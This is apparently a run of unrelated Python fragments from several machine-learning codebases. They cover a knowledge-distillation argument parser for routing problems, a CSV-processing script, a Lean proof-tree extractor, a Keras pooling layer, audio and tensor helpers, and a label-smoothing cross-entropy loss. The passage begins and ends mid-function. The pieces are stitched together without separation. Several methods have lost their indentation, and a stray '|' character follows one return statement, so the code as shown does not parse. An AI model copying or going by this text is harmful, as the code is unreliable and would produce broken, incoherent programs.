    parser.add_argument('--n_encode_layers', type=int, default=3, help='Number of layers in the encoder/critic network')
    parser.add_argument('--tanh_clipping', type=float, default=10.0, help='Clip the parameters to within +- this value using tanh.Set to 0 to not perform any clipping.')
    parser.add_argument('--normalization', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
    # Knowledge-distillation options.
    parser.add_argument('--distillation', action='store_true', default=True, help='whether to use knowledge distillation')
    parser.add_argument('--adaptive_prob', action='store_true', default=True, help='randomly choose teacher considering the gap of each distribution')
    parser.add_argument('--random_adaptive_prob', type=float, default=0, help='randomly choose whether considering the gap or not')
    parser.add_argument('--adaptive_prob_type', type=str, default='softmax', help='the way to calculate the adaptive prob, softmax or sum')
    parser.add_argument('--start_adaptive_epoch', type=int, default=500)
    # Student model architecture.
    parser.add_argument('--student_embedding_dim', type=int, default=64, help='Dimension of input embedding in student net')
    parser.add_argument('--student_hidden_dim', type=int, default=64, help='Dimension of hidden layers in Enc/Dec in student net')
    parser.add_argument('--student_n_encode_layers', type=int, default=3, help='Number of layers in the encoder/critic network in student net')
    parser.add_argument('--student_normalization', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
    parser.add_argument('--student_feed_forward_hidden', default=512, type=int, help='FFN dim in student graph encoder(Transformer block)')
    parser.add_argument('--student_load', action='store_true', default=False, help='whether to load student model')
    parser.add_argument('--student_load_path', type=str, help='load path of the student model')
    parser.add_argument('--n_cluster', type=int, default=3, help='n_cluster for cluster distribution')
    parser.add_argument('--n_cluster_mix', type=int, default=1, help='n_cluster for mixed cluster distribution')
    parser.add_argument('--generate_mix_data', action='store_true', default=False, help='whether to generate mix data')
    parser.add_argument('--distill_temperature', type=int, default=1)
    parser.add_argument('--rl_alpha', type=float, default=0.5, help='weight for RL loss (task loss)')
    parser.add_argument('--distill_alpha', type=float, default=0.5, help='weight for KLD loss (distill loss)')
    parser.add_argument('--twist_kldloss', action='store_true', default=False)
    parser.add_argument('--meaningful_KLD', action='store_true', default=False)
    parser.add_argument('--router', type=str, default='student', help='Teacher or student acts as the router')
    parser.add_argument('--hinton_t2', action='store_true', default=False, help='soft target loss * temperature^2')
    parser.add_argument('--distill_distribution', action='store_true', default=False, help='AMDKD')
    # Per-distribution teacher checkpoints and settings.
    parser.add_argument('--load_path_uniform', type=str, help='teacher model under uniform distribution')
    parser.add_argument('--load_path_cluster', type=str, help='teacher model under cluster distribution')
    parser.add_argument('--load_path_mixed', type=str, help='teacher model under mixed distribution')
    parser.add_argument('--multi_distribution_baseline', action='store_true', default=False, help='whether to use mix data during baseline evaluation')
    parser.add_argument('--multi_teacher', action='store_true', default=False, help='whether to use the multi-teacher loss[1]')
    parser.add_argument('--multi_test', action='store_true', default=False, help='whether to test in different distributions')
    parser.add_argument('--normalization_uniform', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
    parser.add_argument('--normalization_cluster', default='instance', help="Normalization type, 'batch' (default) or 'instance'")
    parser.add_argument('--normalization_mixed', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
    parser.add_argument('--val_dataset_uniform', type=str, default=None, help='Dataset file to use for validation')
    parser.add_argument('--val_dataset_cluster', type=str, default=None, help='Dataset file to use for validation')
    parser.add_argument('--val_dataset_mixed', type=str, default=None, help='Dataset file to use for validation')
    # Training hyperparameters.
    parser.add_argument('--lr_model', type=float, default=0.0001, help='Set the learning rate for the actor network(1e-4 for basic AM)')
    parser.add_argument('--lr_critic', type=float, default=0.0001, help='Set the learning rate for the critic network')
    parser.add_argument('--lr_decay', type=float, default=1.0, help='Learning rate decay per epoch')
    parser.add_argument('--eval_only', action='store_true', default=False, help='Set this value to only evaluate model')
    parser.add_argument('--n_epochs', type=int, default=10000, help='The number of epochs to train')
    parser.add_argument('--seed', type=int, default=1234, help='Random seed to use')
    parser.add_argument('--max_grad_norm', type=float, default=1.0, help='Maximum L2 norm for gradient clipping, default 1.0 (0 to disable clipping)')
    parser.add_argument('--no_cuda', action='store_true', help='Disable CUDA')
    parser.add_argument('--exp_beta', type=float, default=0.8, help='Exponential moving average baseline decay (default 0.8)')
    parser.add_argument('--baseline', default='rollout', help="Baseline to use: 'rollout', 'critic' or 'exponential'. Defaults to no baseline.")
    parser.add_argument('--bl_alpha', type=float, default=0.05, help='Significance in the t-test for updating rollout baseline')
    parser.add_argument('--bl_warmup_epochs', type=int, default=None, help='Number of epochs to warmup the baseline, default None means 1 for rollout (exponential used for warmup phase), 0 otherwise. Can only be used with rollout baseline.')
    parser.add_argument('--eval_batch_size', type=int, default=1024, help='Batch size to use during (baseline) evaluation')
    parser.add_argument('--checkpoint_encoder', action='store_true', help='Set to decrease memory usage by checkpointing encoder')
    parser.add_argument('--shrink_size', type=int, default=None, help='Shrink the batch size if at least this many instances in the batch are finished to save memory (default None means no shrinking)')
    parser.add_argument('--data_distribution', type=str, default='uniform', help='Data distribution to use during training, defaults and options depend on problem.')
    # Logging / checkpointing / misc.
    parser.add_argument('--log_step', type=int, default=50, help='Log info every log_step steps')
    parser.add_argument('--log_dir', default='logs', help='Directory to write TensorBoard information to')
    parser.add_argument('--run_name', default='run_AMDKD', help='Name to identify the run')
    parser.add_argument('--output_dir', default='outputs', help='Directory to write output models to')
    parser.add_argument('--epoch_start', type=int, default=0, help='Start at epoch # (relevant for learning rate decay)')
    parser.add_argument('--checkpoint_epochs', type=int, default=1, help='Save checkpoint every n epochs (default 1), 0 to save no checkpoints')
    parser.add_argument('--is_load', action='store_true', default=False, help='whether to load model parameters and optimizer state')
    parser.add_argument('--is_load_multi', action='store_true', default=False)
    parser.add_argument('--load_path', type=str, help='Path to load model parameters and optimizer state from')
    parser.add_argument('--resume', help='Resume from previous checkpoint file')
    parser.add_argument('--no_tensorboard', action='store_true', help='Disable logging TensorBoard files')
    parser.add_argument('--no_progress_bar', action='store_true', help='Disable progress bar')
    parser.add_argument('--all_cuda_visible', action='store_true', help='Whether to use all available cuda')
    parser.add_argument('--CUDA_VISIBLE_ID', default='0', help='Make specific id of cuda visible and use them instead of all available cuda')
    opts = parser.parse_args(args)
    # Restrict visible CUDA devices unless all devices were requested.
    if (not opts.all_cuda_visible):
        os.environ['CUDA_VISIBLE_DEVICES'] = opts.CUDA_VISIBLE_ID
    opts.use_cuda = (torch.cuda.is_available() and (not opts.no_cuda))
    # Bookkeeping fields mutated later during training.
    opts.best = 0
    opts.save_best = False
    # AMDKD always evaluates across all three distributions.
    if opts.distill_distribution:
        opts.multi_test = True
    if opts.multi_test:
        # Default per-distribution validation sets, keyed on problem and size.
        if (opts.problem == 'tsp'):
            opts.val_dataset_uniform = 'data/tsp/tsp_uniform{}_1000_seed1234.pkl'.format(opts.graph_size)
            opts.val_dataset_cluster = 'data/tsp/tsp_cluster{}_1000_seed1234.pkl'.format(opts.graph_size)
            opts.val_dataset_mixed = 'data/tsp/tsp_mixed{}_1000_seed1234.pkl'.format(opts.graph_size)
        elif (opts.problem == 'cvrp'):
            opts.val_dataset_uniform = 'data/vrp/vrp_uniform{}_1000_seed1234.pkl'.format(opts.graph_size)
            opts.val_dataset_cluster = 'data/vrp/vrp_cluster{}_1000_seed1234.pkl'.format(opts.graph_size)
            opts.val_dataset_mixed = 'data/vrp/vrp_mixed{}_1000_seed1234.pkl'.format(opts.graph_size)
    # TSP uses instance normalization throughout.
    if (opts.problem == 'tsp'):
        opts.normalization_uniform = 'instance'
        opts.normalization_mixed = 'instance'
        opts.student_normalization = 'instance'
        opts.normalization = 'instance'
    if opts.adaptive_prob:
        # LKH3 reference optima per distribution [uniform, cluster, mixed],
        # used to compute the optimality gap for adaptive teacher selection.
        if (opts.problem == 'tsp'):
            LKH3_optimal = {20: [3.84485, 1.824836, 3.], 50: [5.686744, 2.666433, 4.912134], 100: [7.753418, 3.667576, 6.729566]}
        elif (opts.problem == 'cvrp'):
            LKH3_optimal = {20: [6.156523, 3., 5.439149], 50: [10.417558, 5.155511, 9.354149], 100: [15.740834, 7.909336, 14.294179]}
        opts.LKH3_optimal = LKH3_optimal[opts.graph_size]
    # Timestamp the run name and derive the checkpoint directory.
    opts.run_name = '{}_{}'.format(opts.run_name, time.strftime('%Y%m%dT%H%M%S'))
    opts.save_dir = os.path.join(opts.output_dir, '{}_{}'.format(opts.problem, opts.graph_size), opts.run_name)
    # Rollout baseline warms up for 1 epoch by default; others need none.
    if (opts.bl_warmup_epochs is None):
        opts.bl_warmup_epochs = (1 if (opts.baseline == 'rollout') else 0)
    if opts.distillation:
        if opts.distill_distribution:
            # Fall back to the bundled teacher checkpoints when none are given.
            if (not opts.load_path_uniform):
                opts.load_path_uniform = 'teacher/{}{}/{}{}-uniform-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
                print('Using given Uniform teacher')
            if (not opts.load_path_cluster):
                opts.load_path_cluster = 'teacher/{}{}/{}{}-cluster-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
                print('Using given Cluster teacher')
            if (not opts.load_path_mixed):
                opts.load_path_mixed = 'teacher/{}{}/{}{}-mixed-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
                print('Using given Mixed teacher')
            opts.load_path_multi = {'uniform': opts.load_path_uniform, 'cluster': opts.load_path_cluster, 'mixed': opts.load_path_mixed}
        else:
            assert (opts.load_path is not None), 'Knowledge Distillation for a single model must load a teacher model!'
    assert ((opts.bl_warmup_epochs == 0) or (opts.baseline == 'rollout'))
    assert ((opts.epoch_size % opts.batch_size) == 0), 'Epoch size must be integer multiple of batch size!'
    return opts
def main(train_set_dir, val_set_dir):
    """Rearrange every CSV in the train and validation set directories.

    Args:
        train_set_dir: Training-set directory, relative to the CWD
            (listed via ``os.getcwd() + train_set_dir``).
        val_set_dir: Validation-set directory, same convention.

    Prints a progress counter while processing; returns None.
    """
    # BUG FIX: the original condition was
    # ``(not exists(train_set_dir)) and exists(val_set_dir)``, which only
    # aborted when the train dir was missing *while* the val dir existed —
    # e.g. both dirs missing slipped through and crashed in os.listdir.
    # Abort when either directory is missing.
    if not (os.path.exists(train_set_dir) and os.path.exists(val_set_dir)):
        print('ERROR: Target Dir Does Not Exist')
        return
    train_csv_list = os.listdir((os.getcwd() + train_set_dir))
    val_csv_list = os.listdir((os.getcwd() + val_set_dir))
    i = 0
    for train in train_csv_list:
        rearrange(((train_set_dir + os.sep) + train), mode='train')
        i += 1
        print('\rProgress: {:>4}/{:>4}'.format(i, len(train_csv_list)), end='')
    i = 0
    for val in val_csv_list:
        rearrange(((val_set_dir + os.sep) + val), mode='validation')
        i += 1
        print('\rProgress: {:>4}/{:>4}'.format(i, len(val_csv_list)), end='')
class Network(nn.Module):
    """Abstract base for configurable networks.

    Stores the raw ``network_config`` and defines optional ``step``/``re_init``
    hooks that subclasses may override; ``forward`` must be implemented.
    """
    def __init__(self, network_config):
        super().__init__()
        self.network_config = network_config

    def forward(self, input):
        # Subclasses must provide the actual computation.
        raise NotImplementedError

    def step(self):
        """Optional per-step hook; no-op by default."""
        pass

    def re_init(self):
        """Optional re-initialization hook; no-op by default."""
        pass
class ProofExtractor():
    """Extracts proof trees and tactic/argument tables from a traced Lean file.

    Consumes tactic trace instances and tactic-parameter position data
    produced by the Lean tracing pipeline and builds flat tables suitable
    for dataset construction.
    """
    # Parsed Lean source file under analysis.
    lean_file: LeanFile
    # Path of the file relative to the project root.
    relative_file_path: Path
    # Raw tactic trace instances (one per tactic execution).
    tactic_instance_data: List[Dict[(str, Any)]]
    tactic_position_data: List[Dict[(str, Any)]]
    # Deduplicated per-position tactic records (built by build_tactic_pos_data).
    tactic_pos_data: List[Dict[(str, Any)]]
    # Tactic key -> resolved/classified tactic record (built by build_tactic_data).
    tactic_data: Dict[(str, Dict[(str, Any)])]
    # (filename, line, column, semicolon reverse depth) -> tactic key.
    tactic_pos_trace_keys: Dict[(Tuple[(str, int, int, int)], str)]
    # Parameter start position -> list of candidate end positions (0-indexed).
    parameter_positions: Dict[(Tuple[(int, int)], List[Tuple[(int, int)]])]
    # 0-indexed positions of tokens ('by' / 'begin' / '{') opening tactic blocks.
    tactic_block_positions: Set[Tuple[(int, int)]]
    # Tactic keys queued for processing, in source order.
    tactics_to_process: List[str]
    processed_tactics: Set[str]
    # Accumulated outputs.
    proof_trees: List[Dict[(str, Any)]]
    proof_table: List[Dict[(str, Any)]]
    tactic_table: List[Dict[(str, Any)]]
    arg_table: List[Dict[(str, Any)]]
    def __init__(self, lean_file: LeanFile, relative_file_path: str, tactic_instance_data: List[Dict[(str, Any)]], tactic_params_pos_data: List[Dict[(str, Any)]]):
        """Store the trace inputs and initialize empty output tables.

        Args:
            lean_file: Parsed Lean source file.
            relative_file_path: File path relative to the project root.
                NOTE(review): annotated as ``Path`` on the class but a ``str``
                is passed here — confirm which type downstream code expects.
            tactic_instance_data: Raw tactic trace instances.
            tactic_params_pos_data: Tactic-parameter position records.
        """
        self.lean_file = lean_file
        self.relative_file_path = relative_file_path
        self.tactic_instance_data = tactic_instance_data
        self.tactic_params_pos_data = tactic_params_pos_data
        self.tactic_pos_data = []
        self.tactic_data = {}
        # Output accumulators filled by the build_*/extract_* passes.
        self.proof_trees = []
        self.proof_table = []
        self.tactic_table = []
        self.arg_table = []
def remove_index_from_key(key: str) -> str:
return ':'.join(key.split(':')[:3])
def build_tactic_pos_data(self) -> None:
tactic_pos_data = {}
for tactic_instance in self.tactic_instance_data:
tactic_pos = {}
tactic_pos['filename'] = tactic_instance['filename']
tactic_pos['key'] = self.remove_index_from_key(tactic_instance['key'])
tactic_pos['trace_pos_line'] = tactic_instance['trace_pos_line']
tactic_pos['trace_pos_column'] = tactic_instance['trace_pos_column']
tactic_pos['line'] = tactic_instance['line']
tactic_pos['column'] = tactic_instance['column']
tactic_pos['depth'] = tactic_instance['depth']
tactic_pos['proof'] = self.remove_index_from_key(tactic_instance['proof'])
tactic_pos['block'] = self.remove_index_from_key(tactic_instance['block'])
tactic_pos['parent'] = self.remove_index_from_key(tactic_instance['parent'])
tactic_pos_data[(tactic_pos['filename'], tactic_pos['key'])] = tactic_pos
self.tactic_pos_data = list(tactic_pos_data.values())
    def build_tactic_data(self) -> None:
        """Resolve each traced tactic to its source location and classify it.

        Processes tactics shallow-to-deep so a tactic's parent is already in
        ``self.tactic_data`` when semicolon chains are unwound. Tactics whose
        trace position differs from their stated position are skipped. Each
        tactic is classified as 'semicolon', 'begin_end' (a ``{ ... }`` or
        ``begin/end``/``match .. end`` block, relocated to its opening
        token), or 'named'; for non-semicolon tactics, any enclosing chain of
        semicolon parents is rewritten in place to point at this tactic's
        position, recording each parent's reverse depth within the chain.
        """
        self.tactic_data = {}
        # Sort by depth so parents (shallower) are processed before children.
        for tac in sorted(self.tactic_pos_data, key=(lambda tac: tac['depth'])):
            # Skip entries whose trace position disagrees with the tactic's
            # own stated position (these are secondary trace emissions).
            if ((tac['trace_pos_line'], tac['trace_pos_column']) != (tac['line'], tac['column'])):
                continue
            data = {}
            data['filename'] = tac['filename']
            data['key'] = tac['key']
            data['parent'] = tac['parent']
            data['depth'] = tac['depth']
            # Token at the tactic's position decides its classification.
            # (Positions are 1-indexed in the trace, 0-indexed in LeanFile.)
            symbol = self.lean_file.get_token((tac['line'] - 1), (tac['column'] - 1)).string
            if (symbol == ';'):
                # Semicolon combinator: keep the ';' position; location fields
                # will be rewritten later by a descendant 'named' tactic.
                data['type'] = 'semicolon'
                data['line'] = tac['line']
                data['column'] = tac['column']
                data['semicolon_reverse_depth'] = None
                data['preceeding_symbol'] = None
                data['preceeding_line'] = None
                data['preceeding_column'] = None
            else:
                if (symbol == '}'):
                    # Relocate to the matching '{' that opens the block.
                    left = self.lean_file.find_left_bracket(['{'], ['}'], (tac['line'] - 1), (tac['column'] - 1))
                    data['type'] = 'begin_end'
                    data['line'] = (left.line + 1)
                    data['column'] = (left.column + 1)
                elif (symbol == 'end'):
                    # Relocate to the matching 'begin' (or 'match') opener.
                    left = self.lean_file.find_left_bracket(['begin', 'match'], ['end'], (tac['line'] - 1), (tac['column'] - 1))
                    data['type'] = 'begin_end'
                    data['line'] = (left.line + 1)
                    data['column'] = (left.column + 1)
                else:
                    data['type'] = 'named'
                    data['line'] = tac['line']
                    data['column'] = tac['column']
                # Token just before the tactic (used to detect block openers).
                preceeding_token = self.lean_file.get_prev_matching_pattern((data['line'] - 1), (data['column'] - 1), [TokenType.SYMBOL, TokenType.ALPHANUMERIC])
                data['preceeding_symbol'] = preceeding_token.string
                data['preceeding_line'] = (preceeding_token.line + 1)
                data['preceeding_column'] = (preceeding_token.column + 1)
                data['semicolon_reverse_depth'] = 0
                # Walk up the chain of semicolon parents: each enclosing
                # semicolon tactic inherits this tactic's position, with an
                # increasing reverse depth, until a non-semicolon parent or a
                # parent already positioned at/after this tactic is reached.
                current_data = data
                rev_depth = 0
                while (current_data['parent'] in self.tactic_data):
                    parent = self.tactic_data[current_data['parent']]
                    if (parent['type'] != 'semicolon'):
                        break
                    if ((data['line'], data['column']) > (parent['line'], parent['column'])):
                        break
                    rev_depth += 1
                    current_data = parent
                    current_data['line'] = data['line']
                    current_data['column'] = data['column']
                    current_data['semicolon_reverse_depth'] = rev_depth
                    current_data['preceeding_symbol'] = data['preceeding_symbol']
                    current_data['preceeding_line'] = data['preceeding_line']
                    current_data['preceeding_column'] = data['preceeding_column']
            self.tactic_data[data['key']] = data
    def build_parser_hints(self) -> None:
        """Precompute the lookup structures used while parsing proofs.

        Builds ``parameter_positions`` (0-indexed parameter start -> list of
        candidate end positions), ``tactic_block_positions`` (0-indexed
        positions of 'by'/'begin'/'{' tokens that open a tactic block),
        ``tactics_to_process`` (tactic keys in source order), and
        ``tactic_pos_trace_keys`` ((filename, line, column, reverse depth)
        -> tactic key). Also resets ``processed_tactics``.
        """
        # Source order so parsing hints are consumed front-to-back.
        tactic_data_list = sorted(self.tactic_data.values(), key=(lambda tac: (tac['line'], tac['column'])))
        self.tactic_params_pos_data.sort(key=(lambda param: (param['line'], param['column'])))
        self.parameter_positions = collections.defaultdict(list)
        for param in self.tactic_params_pos_data:
            # Convert 1-indexed trace positions to 0-indexed file positions.
            self.parameter_positions[((param['line'] - 1), (param['column'] - 1))].append(((param['end_line'] - 1), (param['end_column'] - 1)))
        self.tactic_block_positions = set()
        self.tactics_to_process = []
        self.tactic_pos_trace_keys = {}
        for tac in tactic_data_list:
            # A tactic directly preceded by 'by', 'begin' or '{' marks the
            # opening token's position as the start of a tactic block.
            if (tac['preceeding_symbol'] in ('by', 'begin', '{')):
                self.tactic_block_positions.add(((tac['preceeding_line'] - 1), (tac['preceeding_column'] - 1)))
            self.tactics_to_process.append(tac['key'])
            self.tactic_pos_trace_keys[(tac['filename'], tac['line'], tac['column'], tac['semicolon_reverse_depth'])] = tac['key']
        self.processed_tactics = set()
    def extract_ast(self, ast: AST.ASTData, proof_key: str, parent_key: str, parent_type: str, index: int) -> Dict[(str, Any)]:
        """Recursively convert a parsed proof AST into a nested dict tree.

        As a side effect, appends one flat row per node to ``proof_table``,
        ``tactic_table`` or ``arg_table`` depending on the node type.  Node
        keys are ``"filename:line:column"`` strings with 1-based positions.

        Args:
            ast: AST node to convert.
            proof_key: key of the enclosing proof (stamped on tactic rows).
            parent_key: key of the parent node ('' at the proof root).
            parent_type: node_type of the parent ('' at the proof root).
            index: position of this node among its siblings.

        Returns:
            The nested dict node ('key', 'node_type', 'node_subtype', children...).
        """
        node = {}
        node['key'] = None
        row = {}
        row['key'] = None
        row['filename'] = self.relative_file_path
        # Parser positions are 0-based; table rows are 1-based.
        row['start_line'] = (ast.line + 1)
        row['start_column'] = (ast.column + 1)
        row['end_line'] = (ast.end_line + 1)
        row['end_column'] = (ast.end_column + 1)
        row['code_string'] = self.lean_file.slice_string(ast.line, ast.column, ast.end_line, ast.end_column, clean=True)
        row['class'] = None
        row['parent_key'] = parent_key
        row['parent_type'] = parent_type
        row['index'] = index
        # 'line'/'column' anchor the node's key; infix nodes re-anchor them
        # to the operator position below.
        row['line'] = (ast.line + 1)
        row['column'] = (ast.column + 1)
        key = f"{row['filename']}:{row['line']}:{row['column']}"
        # infix_key matches semicolon_reverse_depth in tactic_pos_trace_keys
        # (0 for plain tactics, semicolon_count for ';' nodes, -1 for '<|>').
        infix_key = 0
        if isinstance(ast, AST.ByProof):
            node['node_type'] = 'proof'
            node['node_subtype'] = 'by'
            node['tactic'] = self.extract_ast(ast.tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
            row['first_tactic_key'] = node['tactic']['key']
        elif isinstance(ast, AST.BeginProof):
            node['node_type'] = 'proof'
            node['node_subtype'] = 'begin'
            node['tactics'] = []
            for (i, tactic) in enumerate(ast.tactics):
                node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
            row['first_tactic_key'] = node['tactics'][0]['key']
        elif isinstance(ast, AST.BracketProof):
            node['node_type'] = 'proof'
            node['node_subtype'] = 'bracket'
            node['tactics'] = []
            for (i, tactic) in enumerate(ast.tactics):
                node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
            row['first_tactic_key'] = node['tactics'][0]['key']
        elif isinstance(ast, AST.SemicolonListTactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'semicolon_list'
            # Re-anchor the key at the ';' operator position.
            row['line'] = (ast.semicolon_line + 1)
            row['column'] = (ast.semicolon_column + 1)
            key = f"{row['filename']}:{row['line']}:{row['column']}"
            infix_key = ast.semicolon_count
            node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
            node['tactics2'] = []
            for (i, tactic) in enumerate(ast.tactic_list):
                node['tactics2'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=(i + 1)))
        elif isinstance(ast, AST.SemicolonTactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'semicolon'
            # Re-anchor the key at the ';' operator position.
            row['line'] = (ast.semicolon_line + 1)
            row['column'] = (ast.semicolon_column + 1)
            key = f"{row['filename']}:{row['line']}:{row['column']}"
            infix_key = ast.semicolon_count
            node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
            node['tactic2'] = self.extract_ast(ast.tactic2, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=1)
        elif isinstance(ast, AST.AlternativeTactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'alternative'
            # Re-anchor the key at the '<|>' operator position.
            row['line'] = (ast.alternative_line + 1)
            row['column'] = (ast.alternative_column + 1)
            key = f"{row['filename']}:{row['line']}:{row['column']}"
            infix_key = (- 1)
            node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
            node['tactic2'] = self.extract_ast(ast.tactic2, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=1)
        elif isinstance(ast, AST.Solve1Tactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'solve1'
            node['tactics'] = []
            for (i, tactic) in enumerate(ast.tactics):
                node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
        elif isinstance(ast, AST.NamedTactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'named'
            node['args'] = []
            for (i, arg) in enumerate(ast.args):
                node['args'].append(self.extract_ast(arg, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
        elif isinstance(ast, AST.ITactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'itactic'
            node['tactics'] = []
            for (i, tactic) in enumerate(ast.tactics):
                node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
        elif isinstance(ast, AST.CalcTactic):
            node['node_type'] = 'tactic'
            node['node_subtype'] = 'calc'
        elif isinstance(ast, AST.ITacticTacticParam):
            node['node_type'] = 'tactic_arg'
            node['node_subtype'] = 'itactic'
            node['tactic'] = self.extract_ast(ast.tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
        elif isinstance(ast, AST.TacticParam):
            node['node_type'] = 'tactic_arg'
            node['node_subtype'] = 'expression'
        else:
            # Unknown AST node type: fail loudly rather than emit partial data.
            raise Exception(ast)
        # Recompute the (possibly re-anchored) key and stamp it on node and row.
        node['key'] = row['key'] = f"{row['filename']}:{row['line']}:{row['column']}"
        row['class'] = node['node_subtype']
        if (node['node_type'] == 'proof'):
            self.proof_table.append(row)
        elif (node['node_type'] == 'tactic'):
            row['proof_key'] = proof_key
            # Link back to the traced tactic at the same position, if any.
            if ((row['filename'], row['start_line'], row['start_column'], infix_key) in self.tactic_pos_trace_keys):
                trace_key = self.tactic_pos_trace_keys[(row['filename'], row['start_line'], row['start_column'], infix_key)]
                self.processed_tactics.add(trace_key)
                row['trace_key'] = trace_key
            else:
                row['trace_key'] = ''
            self.tactic_table.append(row)
        elif (node['node_type'] == 'tactic_arg'):
            self.arg_table.append(row)
        return node
def extract_proof_ast(self, ast: Union[(AST.ByProof, AST.BeginProof, AST.BracketProof)]) -> Dict[(str, Any)]:
return self.extract_ast(ast, proof_key=f'{self.relative_file_path}:{(ast.line + 1)}:{(ast.column + 1)}', parent_key='', parent_type='', index=0)
    def run(self):
        """Drive the full extraction pipeline for one Lean file.

        Builds the tactic position/trace data and parser hints, then parses
        every proof block that was not already reached while parsing an
        earlier proof, appending each resulting proof tree to
        ``self.proof_trees``.  Parse failures are logged and skipped.
        """
        self.build_tactic_pos_data()
        self.build_tactic_data()
        self.build_parser_hints()
        for key in self.tactics_to_process:
            # extract_ast marks nested tactics as processed, so inner proof
            # blocks already covered by an earlier parse are skipped here.
            if (key in self.processed_tactics):
                continue
            tac = self.tactic_data[key]
            try:
                # Start the parser just before the block opener token.
                parser = LeanParser(self.lean_file, (tac['preceeding_line'] - 1), (tac['preceeding_column'] - 1), parameter_positions=self.parameter_positions, tactic_block_positions=self.tactic_block_positions)
                if (tac['preceeding_symbol'] == 'by'):
                    parser_ast = parser.read_by()
                elif (tac['preceeding_symbol'] == 'begin'):
                    parser_ast = parser.read_begin()
                elif (tac['preceeding_symbol'] == '{'):
                    parser_ast = parser.read_bracket_proof()
                else:
                    raise Exception(f'This tactic should already have been processed: {tac}')
                proof_tree = self.extract_proof_ast(parser_ast)
                self.proof_trees.append(proof_tree)
            except Exception:
                # Best-effort: report the failing file and keep going.
                print(self.lean_file.filename)
                traceback.print_exc()
class AveragePooling3D(ZooKerasLayer):
    """Average pooling layer for 3D data.

    Only border_mode='valid' is supported; any other value raises via
    invalidInputError before the layer is constructed.
    """

    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='th', input_shape=None, **kwargs):
        if border_mode != 'valid':
            invalidInputError(False, "For AveragePooling3D, only border_mode='valid' is supported for now")
        # The backend constructor expects a list (or None) for the input shape.
        shape_list = list(input_shape) if input_shape else None
        super(AveragePooling3D, self).__init__(None, pool_size, strides, dim_ordering, shape_list, **kwargs)
def _unflatten_dense_tensors(flat, tensors):
outputs = []
offset = 0
for tensor in tensors:
numel = tensor.numel()
outputs.append(flat.narrow(0, offset, numel).view_as(tensor))
offset += numel
return tuple(outputs) |
def mel_spectrogram_torch_data(y, data):
    """Compute the mel spectrogram of *y* using the STFT/mel settings stored on *data*."""
    return mel_spectrogram_torch(
        y,
        data.filter_length,
        data.n_mel_channels,
        data.sampling_rate,
        data.hop_length,
        data.win_length,
        data.mel_fmin,
        data.mel_fmax,
        center=False,
    )
def cross_entropy(logits, target, weight=None, ignore_index=(- 100), reduction='mean', smooth_eps=None, smooth_dist=None):
    """Cross entropy loss with support for target distributions and label smoothing.

    Args:
        logits: unnormalized scores of shape (..., num_classes).
        target: long class indices, or a float distribution over classes.
        weight: optional per-class weights applied to the log-probabilities.
        ignore_index: label value masked out of the loss (long targets only).
        reduction: 'none' | 'sum' | 'mean'.
        smooth_eps: label-smoothing factor; 0/None disables smoothing.
        smooth_dist: optional distribution to smooth toward (default: uniform).

    Returns:
        The (possibly reduced) loss tensor.
    """
    # Fix: the original "docstring" was an unterminated single-quote string
    # literal (a syntax error); it is now a proper docstring.
    smooth_eps = (smooth_eps or 0)
    if (_is_long(target) and (smooth_eps == 0)):
        # Hard labels, no smoothing: defer to the fused torch implementation.
        return F.cross_entropy(logits, target, weight, ignore_index=ignore_index, reduction=reduction)
    masked_indices = None
    num_classes = logits.size((- 1))
    if (_is_long(target) and (ignore_index >= 0)):
        masked_indices = target.eq(ignore_index)
    if ((smooth_eps > 0) and (smooth_dist is not None)):
        if _is_long(target):
            target = onehot(target, num_classes).type_as(logits)
        if (smooth_dist.dim() < target.dim()):
            smooth_dist = smooth_dist.unsqueeze(0)
        # Blend the (now soft) target toward smooth_dist in-place.
        target.lerp_(smooth_dist, smooth_eps)
    lsm = F.log_softmax(logits, dim=(- 1))
    if (weight is not None):
        lsm = (lsm * weight.unsqueeze(0))
    if _is_long(target):
        # Uniform label smoothing spread over the non-target classes.
        eps = (smooth_eps / (num_classes - 1))
        # Fix: squeeze the gathered dim so nll has shape (...,) like
        # lsm.sum(-1); without it the subtraction broadcast (B, 1) against
        # (B,) into a spurious (B, B) loss.
        nll = (- lsm.gather(dim=(- 1), index=target.unsqueeze((- 1))).squeeze((- 1)))
        loss = (((1.0 - (2 * eps)) * nll) - (eps * lsm.sum((- 1))))
    else:
        # Soft targets: full cross entropy against the target distribution.
        loss = (- (target * lsm).sum((- 1)))
    if (masked_indices is not None):
        loss.masked_fill_(masked_indices, 0)
    if (reduction == 'sum'):
        loss = loss.sum()
    elif (reduction == 'mean'):
        if (masked_indices is None):
            loss = loss.mean()
